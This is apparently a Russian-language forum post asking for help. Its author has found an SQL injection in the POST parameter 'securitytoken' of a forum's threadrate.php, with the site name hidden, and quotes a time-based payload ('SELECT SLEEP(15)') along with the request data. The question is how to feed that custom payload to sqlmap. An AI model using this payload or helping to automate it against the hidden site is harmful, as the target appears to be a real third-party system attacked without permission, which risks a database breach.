Есть уязвимость. SQLi

Предположим так (заменил дабы не палить):

Url: http://www.site.com/threadrate.php?t=104496

Method: post

Param: securitytoken

Payload: "));SELECT+SLEEP(15)/*

Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5

как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.

А без него уязвимость не видит. Прошу, помогите